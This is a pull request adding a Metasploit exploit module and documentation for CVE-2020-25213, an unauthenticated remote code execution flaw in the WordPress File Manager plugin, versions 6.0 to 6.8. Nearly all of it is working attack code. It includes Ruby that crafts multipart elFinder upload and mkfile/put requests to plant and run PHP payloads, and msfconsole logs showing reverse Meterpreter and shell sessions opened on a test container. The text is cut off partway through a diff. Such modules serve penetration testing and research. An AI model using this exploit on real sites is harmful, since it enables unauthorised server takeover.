### PR TITLE
WordPress File Manager unauthenticated RCE (CVE-2020-25213)

### DIFF
--- a/documentation/modules/exploit/multi/http/wp_file_manager_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_file_manager_rce.md
@@ -1,0 +1,80 @@
+## Vulnerable Application
+
+Get a copy of version 6.0 plugin from https://wordpress.org/plugins/wp-file-manager/advanced/.
+
+Vulnerable versions are 6.0-6.8. Versions below 6 are not vulnerable and version 6.9 has been patched.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/multi/http/wp_file_manager_rce`
+3. Do: `set TARGETURI <target_uri>`
+4. Do: `set RHOSTS <target_ip>`
+5. Optional: Do: `set RPORT <target_port>`
+6. Optional: Do: `set PAYLOAD <payload>` to switch payloads
+7. Optional: Do: `set VERBOSE true` for more information
+8. Do: `check` to confirm existence of vulnerability or `exploit` to let the shells rain
+
+## Options
+`TARGETURI`: location of the WordPres File Manager root directory. Change with `set TARGETURI <target_uri>`
+`PAYLOAD`: the payload to execute. Change with `set PAYLOAD <payload>` 
+
+### Option Name
+`TARGETURI`:  should point to the location of the WordPress File Manager root directory. By default, it is `/wp-content/plugins/wp-file-manager`.
+`PAYLOAD`: the payload to execute. By default, it is `php/reverse_php`.
+
+## Test Environment
+
+Tested against WordPress 5.5.1 in a Docker container with File Manager plugin version 6.0 
+
+### Version and OS
+
+Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, default payload
+```
+msf6 > use exploit/multi/http/wp_file_manager_rce 
+[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
+RPORT => 8080
+msf6 exploit(multi/http/wp_file_manager_rce) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/wp_file_manager_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.137.128:4444 
+[*] 127.0.0.1:8080 - Detected WordPress File Manager version 6.0
+[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/gnjqFk.php
+[*] Sending stage (39264 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 172.17.0.2:45710) at 2020-10-11 00:49:34 +0800
+
+meterpreter > sysinfo
+Computer    : 6e5e66001274
+OS          : Linux 6e5e66001274 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > 
+```
+
+Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, `php/reverse_php` payload
+```
+msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
+RPORT => 8080
+msf6 exploit(multi/http/wp_file_manager_rce) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/wp_file_manager_rce) > set PAYLOAD php/reverse_php
+PAYLOAD => php/reverse_php
+msf6 exploit(multi/http/wp_file_manager_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.137.128:4444 
+[*] 127.0.0.1:8080 - Detected WordPress File Manager version 6.0
+[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/G8hgHC.php
+[*] Command shell session 2 opened (192.168.137.128:4444 -> 172.17.0.2:45718) at 2020-10-11 00:50:52 +0800
+
+uname -a
+Linux 6e5e66001274 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64 GNU/Linux
+whoami
+www-data
+```

--- a/documentation/modules/exploit/multi/http/wp_file_manager_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_file_manager_rce.md
@@ -1,8 +1,8 @@
 ## Vulnerable Application
 
-Get a copy of version 6.0 plugin from https://wordpress.org/plugins/wp-file-manager/advanced/.
+Get a copy of version 6.0 plugin from https://downloads.wordpress.org/plugin/wp-file-manager.6.0.zip.
 
-Vulnerable versions are 6.0-6.8. Versions below 6 are not vulnerable and version 6.9 has been patched.
+Vulnerable versions are 6.0-6.8. Versions below 6.0 are not vulnerable and version 6.9 has been patched.
 
 ## Verification Steps
 
@@ -12,23 +12,23 @@ Vulnerable versions are 6.0-6.8. Versions below 6 are not vulnerable and version
 4. Do: `set RHOSTS <target_ip>`
 5. Optional: Do: `set RPORT <target_port>`
 6. Optional: Do: `set PAYLOAD <payload>` to switch payloads
-7. Optional: Do: `set VERBOSE true` for more information
-8. Do: `check` to confirm existence of vulnerability or `exploit` to let the shells rain
+7. Optional: Do: `set COMMAND <command>` to switch elFinder commands used to exploit vulnerability
+7. Do: `check` to confirm existence of vulnerability or `exploit` to let the shells rain
 
 ## Options
-`TARGETURI`: location of the WordPres File Manager root directory. Change with `set TARGETURI <target_uri>`
-`PAYLOAD`: the payload to execute. Change with `set PAYLOAD <payload>`
 
-### Option Name
-`TARGETURI`:  should point to the location of the WordPress File Manager root directory. By default, it is
-`/wp-content/plugins/wp-file-manager`.
-`PAYLOAD`: the payload to execute. By default, it is `php/reverse_php`.
+### COMMAND
+This vulnerability can be exploited in 2 ways:
+1. `upload` to directly upload a payload
+2. `mkfile` to create a file, then `put` to write arbitrary code to the newly created file
+
+This option has 2 valid values:
+1. `upload`: exploit using the `upload` technique (default)
+2. `mkfile+put`: exploit using `mkfile` and `put` 
 
 ## Scenarios
 
-Tested against WordPress 5.5.1 in a Docker container with File Manager plugin version 6.0
-
-### Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, default payload
+### Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, default payload, using `upload`
 
 ```
 msf6 > use exploit/multi/http/wp_file_manager_rce 
@@ -42,21 +42,22 @@ VERBOSE => true
 msf6 exploit(multi/http/wp_file_manager_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.137.128:4444 
-[*] 127.0.0.1:8080 - Detected WordPress File Manager version 6.0
-[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/gnjqFk.php
-[*] Sending stage (39264 bytes) to 172.17.0.2
-[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 172.17.0.2:45710) at 2020-10-11 00:49:34 +0800
+[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
+[*] Found version 6.0 in the plugin
+[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/aEiptb.php
+[*] Sending stage (39264 bytes) to 172.17.0.3
+[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 172.17.0.3:35578) at 2020-10-12 20:19:16 +0800
 
 meterpreter > sysinfo
-Computer    : 6e5e66001274
-OS          : Linux 6e5e66001274 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64
+Computer    : 6fc94cd81e93
+OS          : Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64
 Meterpreter : php/linux
 meterpreter > getuid
 Server username: www-data (33)
 meterpreter > 
 ```
 
-### Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, `php/reverse_php` payload
+### Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, `php/reverse_php` payload, using `upload`
 ```
 msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
 RHOSTS => 127.0.0.1
@@ -69,12 +70,67 @@ PAYLOAD => php/reverse_php
 msf6 exploit(multi/http/wp_file_manager_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.137.128:4444 
-[*] 127.0.0.1:8080 - Detected WordPress File Manager version 6.0
-[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/G8hgHC.php
-[*] Command shell session 2 opened (192.168.137.128:4444 -> 172.17.0.2:45718) at 2020-10-11 00:50:52 +0800
+[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
+[*] Found version 6.0 in the plugin
+[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/XFVi0d.php
+[*] Command shell session 2 opened (192.168.137.128:4444 -> 172.17.0.3:35598) at 2020-10-12 20:20:04 +0800
 
 uname -a
-Linux 6e5e66001274 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64 GNU/Linux
+Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64 GNU/Linux
+whoami
+www-data
+```
+
+### Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, default payload, using `mkfile+put`
+```
+msf6 > use multi/http/wp_file_manager_rce
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
+RPORT => 8080
+msf6 exploit(multi/http/wp_file_manager_rce) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/wp_file_manager_rce) > set COMMAND mkfile+put 
+COMMAND => mkfile+put
+msf6 exploit(multi/http/wp_file_manager_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.137.128:4444 
+[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
+[*] Found version 6.0 in the plugin
+[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/unl8LJ.php
+[*] Sending stage (39264 bytes) to 172.17.0.3
+[*] Meterpreter session 5 opened (192.168.137.128:4444 -> 172.17.0.3:38076) at 2020-10-15 17:42:00 +0800
+
+meterpreter > sysinfo
+Computer    : 6fc94cd81e93
+OS          : Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > 
+```
+
+### Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, `php/reverse_php` payload, using `mkfile+put`
+```
+msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
+RPORT => 8080
+msf6 exploit(multi/http/wp_file_manager_rce) > set PAYLOAD php/reverse_php
+PAYLOAD => php/reverse_php
+msf6 exploit(multi/http/wp_file_manager_rce) > set COMMAND mkfile+put 
+COMMAND => mkfile+put
+msf6 exploit(multi/http/wp_file_manager_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.137.128:4444 
+[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
+[*] Found version 6.0 in the plugin
+[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/DmFEWt.php
+[*] Command shell session 6 opened (192.168.137.128:4444 -> 172.17.0.3:38096) at 2020-10-15 17:43:27 +0800
+
+uname -a
+Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64 GNU/Linux
 whoami
 www-data
 ```

--- a/documentation/modules/exploit/multi/http/wp_file_manager_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_file_manager_rce.md
@@ -17,19 +17,19 @@ Vulnerable versions are 6.0-6.8. Versions below 6 are not vulnerable and version
 
 ## Options
 `TARGETURI`: location of the WordPres File Manager root directory. Change with `set TARGETURI <target_uri>`
-`PAYLOAD`: the payload to execute. Change with `set PAYLOAD <payload>` 
+`PAYLOAD`: the payload to execute. Change with `set PAYLOAD <payload>`
 
 ### Option Name
-`TARGETURI`:  should point to the location of the WordPress File Manager root directory. By default, it is `/wp-content/plugins/wp-file-manager`.
+`TARGETURI`:  should point to the location of the WordPress File Manager root directory. By default, it is
+`/wp-content/plugins/wp-file-manager`.
 `PAYLOAD`: the payload to execute. By default, it is `php/reverse_php`.
 
-## Test Environment
+## Scenarios
 
-Tested against WordPress 5.5.1 in a Docker container with File Manager plugin version 6.0 
+Tested against WordPress 5.5.1 in a Docker container with File Manager plugin version 6.0
 
-### Version and OS
+### Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, default payload
 
-Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, default payload
 ```
 msf6 > use exploit/multi/http/wp_file_manager_rce 
 [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
@@ -56,7 +56,7 @@ Server username: www-data (33)
 meterpreter > 
 ```
 
-Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, `php/reverse_php` payload
+### Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, `php/reverse_php` payload
 ```
 msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
 RHOSTS => 127.0.0.1

--- a/modules/exploits/multi/http/wp_file_manager_rce.rb
+++ b/modules/exploits/multi/http/wp_file_manager_rce.rb
@@ -65,6 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotVulnerable, 'Target is most likely not vulnerable!') unless [CheckCode::Appears].include? check
       # base path to File Manager plugin
       file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')
+      # filename of the file to be uploaded/created
       filename = "#{Rex::Text.rand_text_alphanumeric(6)}.php"
 
       case datastore['COMMAND']
@@ -90,7 +91,6 @@ class MetasploitModule < Msf::Exploit::Remote
     filename = opts['filename']
 
     # prep for exploit
-    # after testing, came to conclusion that we don't need any image data, the exploit works without it
     post_data = Rex::MIME::Message.new
     post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name="cmd"')
 
@@ -106,8 +106,6 @@ class MetasploitModule < Msf::Exploit::Remote
       post_data.add_part(payload.encode, nil, nil, 'form-data; name="content"')
     end
 
-    # the boundary in the Content-Type has 2 less hyphens than the others (!)
-    # it actually has to be that way to work (!)
     res = send_request_cgi(
       'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),
       'method' => 'POST',

--- a/modules/exploits/multi/http/wp_file_manager_rce.rb
+++ b/modules/exploits/multi/http/wp_file_manager_rce.rb
@@ -84,51 +84,26 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # make it easier to switch between "upload" and "mkfile+put" exploit methods
   def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})
-    # after testing, came to conclusion that we don't need any image data, the exploit works without it
-    boundary = "------------------------#{Rex::Text.rand_text_hex(16)}"
     if opts['payload'] != ''
       payload = opts['payload']
     end
     filename = opts['filename']
 
-    post_data = "#{boundary}\r\n"
-    post_data << "Content-Disposition: form-data; name=\"cmd\"\r\n\r\n"
-    post_data << "#{elfinder_cmd}\r\n"
-    post_data << "#{boundary}\r\n"
-    post_data << "Content-Disposition: form-data; name=\"target\"\r\n\r\n"
-    # A1A2A3A4 is replaced by one of:
-    # base64(filename.php) for "put"
-    # nothing for "upload" and "mkfile"
-    post_data << "l1_A1A2A3A4\r\n"
-    post_data << "#{boundary}\r\n"
-    # B1B2B3B4 is replaced by one of:
-    # "upload[]"; filename="<filename>.php" for "upload"
-    # "content" for "put"
-    # "name" for "mkfile"
-    post_data << "Content-Disposition: form-data; name=B1B2B3B4\r\n"
-    # only required for "upload"
-    if elfinder_cmd == 'upload'
-      post_data << "Content-Type: application/octet-stream\r\n\r\n"
-    end
-    # C1C2C3C4 is replaced by one of:
-    # payload data for "upload" and "put"
-    # filename for "mkfile"
-    post_data << "C1C2C3C4\r\n"
-    post_data << "#{boundary}--\r\n"
+    # prep for exploit
+    # after testing, came to conclusion that we don't need any image data, the exploit works without it
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name="cmd"')
 
     case elfinder_cmd
     when 'upload'
-      post_data['A1A2A3A4'] = 'Lw'
-      post_data['B1B2B3B4'] = "\"upload[]\"; filename=\"#{filename}\""
-      post_data['C1C2C3C4'] = payload
+      post_data.add_part('l1_', nil, nil, 'form-data; name="target"')
+      post_data.add_part(payload.encode, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"")
     when 'mkfile'
-      post_data['A1A2A3A4'] = 'Lw'
-      post_data['B1B2B3B4'] = "\"name\"\r\n"
-      post_data['C1C2C3C4'] = filename
+      post_data.add_part('l1_', nil, nil, 'form-data; name="target"')
+      post_data.add_part(filename, nil, nil, 'form-data; name="name"')
     when 'put'
-      post_data['A1A2A3A4'] = Rex::Text.encode_base64(filename)
-      post_data['B1B2B3B4'] = "\"content\"\r\n"
-      post_data['C1C2C3C4'] = payload
+      post_data.add_part("l1_#{Rex::Text.encode_base64(filename)}", nil, nil, 'form-data; name="target"')
+      post_data.add_part(payload.encode, nil, nil, 'form-data; name="content"')
     end
 
     # the boundary in the Content-Type has 2 less hyphens than the others (!)
@@ -136,8 +111,8 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),
       'method' => 'POST',
-      'ctype' => "multipart/form-data; boundary=#{boundary[2..-1]}",
-      'data' => post_data
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s
     )
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res

--- a/modules/exploits/multi/http/wp_file_manager_rce.rb
+++ b/modules/exploits/multi/http/wp_file_manager_rce.rb
@@ -1,0 +1,134 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'WordPress File Manager 6.0-6.8 Unauthenticated Remote Code Execution',
+        'Description'    => %q(
+          The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and
+          execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php
+          extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write
+          PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'Alex Souza (w4fz5uck5)', # initial discovery and PoC
+            'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module
+          ],
+        'References'     =>
+          [
+            [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],
+            [ 'CVE', '2020-25213' ]
+          ],
+        'Platform'       => ['php'],
+        'Privileged'     => false,
+        'Arch'           => ARCH_PHP,
+        'Targets'        =>
+          [
+            [ 'WordPress File Manager 6.0-6.8', {} ]
+          ],
+        'DisclosureDate' => "Sep 9 2020", # disclosure date on NVD, PoC was published on August 26 2020
+        'DefaultTarget'  => 0
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'The URI to File Manager', '/wp-content/plugins/wp-file-manager'])
+      ], self.class
+    )
+  end
+
+  def check
+    begin
+      # the readme file contains the version information, so GET that first
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'readme.txt'),
+        'method'    => 'GET'
+      )
+
+      # handle errors just in case
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}" ) unless res.code == 200
+
+      # the first line after the changelog is the currently installed version
+      changelog_info = res.body.split('== Changelog ==')[1].split("\n")[2]
+      if /(\d\.\d)/ =~ changelog_info
+        version = Gem::Version.new($1)
+        print_status("#{peer} - Detected WordPress File Manager version #{version.to_s}")
+        # versions above 6.8 are patched and versions below 6.0 are not vulnerable
+        unless version < Gem::Version.new('6.0') or version > Gem::Version.new('6.8')
+          return Exploit::CheckCode::Vulnerable
+        end
+      end
+
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  #
+  # The exploit method attempts a login, then attempts to throw a command execution
+  # at a web page through a POST variable
+  #
+  def exploit
+    begin
+      unless [CheckCode::Vulnerable].include? check
+        fail_with Failure::NotVulnerable, "Target is most likely not vulnerable!"
+      end
+
+      # the smallest PNG I found was 51 bytes: https://github.com/mathiasbynens/small/blob/master/png-truncated.png
+      smallest_png_possible = "89504e470d0a1a0a0000000d49484452000000010000000108060000001f15c4890000000a49444154789c6300010000050001"
+      # prep for exploit, it will create a randomly named .php file under TARGETURI/lib/files/
+      boundary = "------------------------#{Rex::Text.rand_text_hex(16)}"
+      post_data = "#{boundary}\r\n"
+      post_data << "Content-Disposition: form-data; name=\"cmd\"\r\n\r\n"
+      post_data << "upload\r\n"
+      post_data << "#{boundary}\r\n"
+      post_data << "Content-Disposition: form-data; name=\"target\"\r\n\r\n"
+      post_data << "l1_Lw\r\n"
+      post_data << "#{boundary}\r\n"
+      post_data << "Content-Disposition: form-data; name=\"upload[]\"; filename=\"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n"
+      post_data << "Content-Type: image/png\r\n\r\n"
+      post_data << Array(smallest_png_possible).pack('H*')
+      post_data << "#{payload.encode}\r\n"
+      post_data << "#{boundary}--\r\n"
+
+      # the boundary in the Content-Type has 2 less hyphens than the others (!)
+      # it actually has to be that way to work (!)
+      res = send_request_cgi(
+        'uri'          => normalize_uri(target_uri.path, 'lib/php/connector.minimal.php'),
+        'method'       => 'POST',
+        'ctype'        => "multipart/form-data; boundary=#{boundary[2..-1]}",
+        'headers'      => {
+            'Accept'          => '*/*',
+            'Accept-Encoding' => 'gzip, deflate',
+            'Connection'      => 'close',
+            'Expect'          => '100-continue'
+        },
+        'data'         => post_data
+      )
+
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200
+
+      # the result body contains the path of the uploaded payload
+      result_body = res.get_json_document
+      payload_uri = result_body['added'][0]['url'].split("../")[1]
+      vprint_status("#{peer} - Payload is at #{normalize_uri(target_uri.path, "lib/#{payload_uri}")}")
+      # execute the payload
+      send_request_cgi(
+        'uri'    => normalize_uri(target_uri.path, "lib/#{payload_uri}"),
+        'method' => 'GET'
+      )
+    end
+  end
+end

--- a/modules/exploits/multi/http/wp_file_manager_rce.rb
+++ b/modules/exploits/multi/http/wp_file_manager_rce.rb
@@ -6,15 +6,15 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
-  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Wordpress
 
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'WordPress File Manager 6.0-6.8 Unauthenticated Remote Code Execution',
+        'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',
         'Description' => %q{
-          The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and
+          The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and
           execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php
           extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write
           PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
             [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],
             [ 'CVE', '2020-25213' ],
           ],
-        'Platform' => ['php'],
+        'Platform' => [ 'php' ],
         'Privileged' => false,
         'Arch' => ARCH_PHP,
         'Targets' =>
@@ -44,89 +44,103 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_options(
       [
-        OptString.new('TARGETURI', [ true, 'The URI to File Manager', '/wp-content/plugins/wp-file-manager'])
-      ], self.class
+        OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),
+        OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])
+      ]
     )
   end
 
   def check
     begin
-      # the readme file contains the version information, so GET that first
-      res = send_request_cgi(
-        'uri' => normalize_uri(target_uri.path, 'readme.txt'),
-        'method' => 'GET'
-      )
+      return CheckCode::Unknown unless wordpress_and_online?
 
-      # handle errors just in case
-      fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
-      # no readme? no version detection. set ForceExploit to exploit even if check fails
-      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200
-
-      # the first line after the changelog is the currently installed version
-      changelog_info = res.body.split('== Changelog ==')[1].split("\n")[2]
-      if /(\d\.\d)/ =~ changelog_info
-        version = Gem::Version.new(Regexp.last_match(1))
-        print_status("#{peer} - Detected WordPress File Manager version #{version}")
-        # versions above 6.8 are patched and versions below 6.0 are not vulnerable
-        unless (version < Gem::Version.new('6.0')) || (version > Gem::Version.new('6.8'))
-          return Exploit::CheckCode::Vulnerable
-        end
-      end
-
-      return Exploit::CheckCode::Safe
+      # check the plugin version from readme
+      check_plugin_version_from_readme('wp-file-manager', nil, 6.0)
     end
   end
 
   def exploit
     begin
-      unless [CheckCode::Vulnerable].include? check
-        fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
+      # carry out check before the exploit
+      fail_with(Failure::NotVulnerable, 'Target is most likely not vulnerable!') unless [CheckCode::Appears].include? check
+      # base path to File Manager plugin
+      file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')
+      filename = "#{Rex::Text.rand_text_alphanumeric(6)}.php"
+
+      case datastore['COMMAND']
+      when 'upload'
+        elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)
+      when 'mkfile+put'
+        elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)
+        elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)
       end
 
-      # the smallest PNG I found was 51 bytes: https://github.com/mathiasbynens/small/blob/master/png-truncated.png
-      smallest_png_possible = '89504e470d0a1a0a0000000d49484452000000010000000108060000001f15c4890000000a49444154789c6300010000050001'
-      # prep for exploit, it will create a randomly named .php file under TARGETURI/lib/files/
-      boundary = "------------------------#{Rex::Text.rand_text_hex(16)}"
-      post_data = "#{boundary}\r\n"
-      post_data << "Content-Disposition: form-data; name=\"cmd\"\r\n\r\n"
-      post_data << "upload\r\n"
-      post_data << "#{boundary}\r\n"
-      post_data << "Content-Disposition: form-data; name=\"target\"\r\n\r\n"
-      post_data << "l1_Lw\r\n"
-      post_data << "#{boundary}\r\n"
-      post_data << "Content-Disposition: form-data; name=\"upload[]\"; filename=\"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n"
-      post_data << "Content-Type: image/png\r\n\r\n"
-      post_data << Array(smallest_png_possible).pack('H*')
-      post_data << "#{payload.encode}\r\n"
-      post_data << "#{boundary}--\r\n"
-
-      # the boundary in the Content-Type has 2 less hyphens than the others (!)
-      # it actually has to be that way to work (!)
-      res = send_request_cgi(
-        'uri' => normalize_uri(target_uri.path, 'lib/php/connector.minimal.php'),
-        'method' => 'POST',
-        'ctype' => "multipart/form-data; boundary=#{boundary[2..-1]}",
-        'headers' => {
-          'Accept' => '*/*',
-          'Accept-Encoding' => 'gzip, deflate',
-          'Connection' => 'close',
-          'Expect' => '100-continue'
-        },
-        'data' => post_data
-      )
-
-      fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
-      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200
-
-      # the result body contains the path of the uploaded payload
-      result_body = res.get_json_document
-      payload_uri = result_body['added'][0]['url'].split('../')[1]
-      vprint_status("#{peer} - Payload is at #{normalize_uri(target_uri.path, "lib/#{payload_uri}")}")
+      payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)
+      print_status("#{peer} - Payload is at #{payload_uri}")
       # execute the payload
-      send_request_cgi(
-        'uri' => normalize_uri(target_uri.path, "lib/#{payload_uri}"),
-        'method' => 'GET'
-      )
+      send_request_cgi('uri' => normalize_uri(payload_uri))
     end
+  end
+
+  # make it easier to switch between "upload" and "mkfile+put" exploit methods
+  def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})
+    # after testing, came to conclusion that we don't need any image data, the exploit works without it
+    boundary = "------------------------#{Rex::Text.rand_text_hex(16)}"
+    if opts['payload'] != ''
+      payload = opts['payload']
+    end
+    filename = opts['filename']
+
+    post_data = "#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"cmd\"\r\n\r\n"
+    post_data << "#{elfinder_cmd}\r\n"
+    post_data << "#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"target\"\r\n\r\n"
+    # A1A2A3A4 is replaced by one of:
+    # base64(filename.php) for "put"
+    # nothing for "upload" and "mkfile"
+    post_data << "l1_A1A2A3A4\r\n"
+    post_data << "#{boundary}\r\n"
+    # B1B2B3B4 is replaced by one of:
+    # "upload[]"; filename="<filename>.php" for "upload"
+    # "content" for "put"
+    # "name" for "mkfile"
+    post_data << "Content-Disposition: form-data; name=B1B2B3B4\r\n"
+    # only required for "upload"
+    if elfinder_cmd == 'upload'
+      post_data << "Content-Type: application/octet-stream\r\n\r\n"
+    end
+    # C1C2C3C4 is replaced by one of:
+    # payload data for "upload" and "put"
+    # filename for "mkfile"
+    post_data << "C1C2C3C4\r\n"
+    post_data << "#{boundary}--\r\n"
+
+    case elfinder_cmd
+    when 'upload'
+      post_data['A1A2A3A4'] = 'Lw'
+      post_data['B1B2B3B4'] = "\"upload[]\"; filename=\"#{filename}\""
+      post_data['C1C2C3C4'] = payload
+    when 'mkfile'
